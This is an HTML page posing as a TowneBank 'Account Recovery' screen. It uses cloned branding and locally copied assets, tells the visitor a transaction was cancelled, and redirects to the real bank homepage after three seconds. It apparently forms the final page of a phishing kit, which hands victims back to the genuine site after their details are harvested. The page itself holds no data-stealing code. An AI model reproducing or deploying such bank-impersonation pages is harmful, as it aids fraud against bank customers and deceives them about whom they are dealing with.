<!DOCTYPE html>
<html lang="en" data-react-helmet="en">
<head>
    <meta http-equiv="refresh" content="3; url=https://www.townebank.com/">
    <meta charset="UTF-8">
    <meta httpequiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta httpequiv="cache-control" content="no-cache">
    <meta httpequiv="pragma" content="no-cache">
    <link rel="shortcut icon" href="favicon.ico">
    <link rel="apple-touch-icon" href="favicon.ico">
    <link rel="manifest" href="#">
    <script src="js/LAB.min.js"></script>
    <script src="js/VisitorAPI.js"></script>
    <script src="js/AppMeasurement.js"></script>
    <script src="js/iframeResizer.min.js"></script>
    <script src="js/DBKAPI.js"></script>
    <title>Towne Bank | Account Recovery</title>
    <link href="css/main.69265a18.chunk.css" rel="stylesheet">
    <link href="css/branding.css" rel="stylesheet">
    <script charset="utf-8" src="js/88.7d44ab6f.chunk.js"></script>
    <script charset="utf-8" src="js/16.61e0d010.chunk.js"></script>
    <link rel="stylesheet" type="text/css" href="css/10.27b24112.chunk.css">
    <link rel="stylesheet" type="text/css" href="css/41.f7d9e455.chunk.css">
    <script charset="utf-8" src="js/10.da1657cc.chunk.js"></script>
    <link rel="stylesheet" type="text/css" href="css/45.16a92a7e.chunk.css">
    <script charset="utf-8" src="js/45.b63e3956.chunk.js"></script>
    <script charset="utf-8" src="js/81.23738d9b.chunk.js"></script>
    <link rel="apple-touch-icon" href="favicon.ico" data-react-helmet="true">
    <link rel="stylesheet" href="css/common.css" data-react-helmet="true">
    <link rel="stylesheet" type="text/css" href="css/12.06f46345.chunk.css">
    <script charset="utf-8" src="js/12.38ae5202.chunk.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=5" data-react-helmet="true">
    <script charset="utf-8" src="js/8.046584cc.chunk.js"></script>
</head>
<body>
<div id="forgotPasswordORUsername" style="min-height:100%;position:relative">
    <div class="fade-in">
        <div class="header_navigation-container__x6sPE">
            <div class="header-container" style="background-color: rgb(0, 33, 73)">
                <div class="header_wrap-content__4C87W">
                    <div class="header">
                        <div class="hamburger visible-xs visible-sm"></div>
                        <div class="logo adjustlogo" role="banner">
                            <a tabindex="-1" href="#">
                                <div>
                                    <img tabindex="0" src="images/tb-logo-gradient-250x36px-u5y4B.png" class="fiLogoLg hidden-xs hidden-sm">
                                    <img src="images/tb-logo-gradient-250x36px-u5y4B.png" class="fiLogoSm visible-xs visible-sm">
                                </div>
                            </a>
                        </div>
                        <div class=" hidden-xs hidden-sm" role="complementary"></div>
                        <div class="nav-area hidden-xs hidden-sm"></div>
                    </div>
                </div>
            </div>
            <div class="main-navigation-container header_empty-container__2-tBa">
                <div class="header_wrap-content__4C87W"></div>
            </div>
        </div>
        <div class="home-page" style="min-height: calc(((100vh - 105px) - 75px) - 0px);">
            <div class="fade-in">
                <div id="forgotContainer" class="container" role="main">
                    <div class="col-xs-12 fade-in">
                        <div class="di-container di-container-overflow">
                            <div class="center-block">
                                <div class="col-xs-12 col-sm-12 main-container xs-col-remove-padding">
                                    <center style="padding-top: 50px">
                                        <svg version="1.1" width="70" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve">
                                            <style type="text/css"><![CDATA[.st0{fill:rgb(1, 69, 118);}]]></style>
                                            <g><path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"/></g>
                                        </svg>
                                        <h2 style="color:rgb(1, 69, 118); padding-top: 20px; padding-bottom: 20px;">The transaction has been cancelled</h2>
                                        <p>You're being redirecte to Homepage......</p>
                                    </center>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="footerSibling" style="padding-bottom: 247px;"></div>
            <div title="Footer Navigation" id="footer-container" role="contentinfo" class="container-fluid footer-container-main" tabindex="-1" aria-describedby="footer-container"><div class="middle-text"><div class="col-xs-12 text middle-text-in">Links are being provided for information purposes only. TowneBank has no control over any other website and is not able to endorse, guarantee or monitor content, availability, viewpoints, products or services that are offered or expressed on any site other than this one.</div></div><div class="image-links"><div class="image-column" role="application"><a tabindex="-1" href="javascript:void(0)" aria-haspopup="true"><img tabindex="0" id="#" alt="FDIC" src="images/member_fdic.png"></a></div><div class="image-column" role="application"><a tabindex="-1" href="javascript:void(0)" aria-haspopup="true"><img tabindex="0" id="#" alt="Equal Housing Lender" src="images/ehl_40x35_k_100.png"></a></div><div class="image-column" role="application"><a tabindex="-1" href="javascript:void(0)" aria-haspopup="true"><img tabindex="0" id="#" alt="Terms and Conditions" src="images/img_termsconditions.gif"></a></div></div></div>
        </div>
    </div>
</div>
</body>
</html>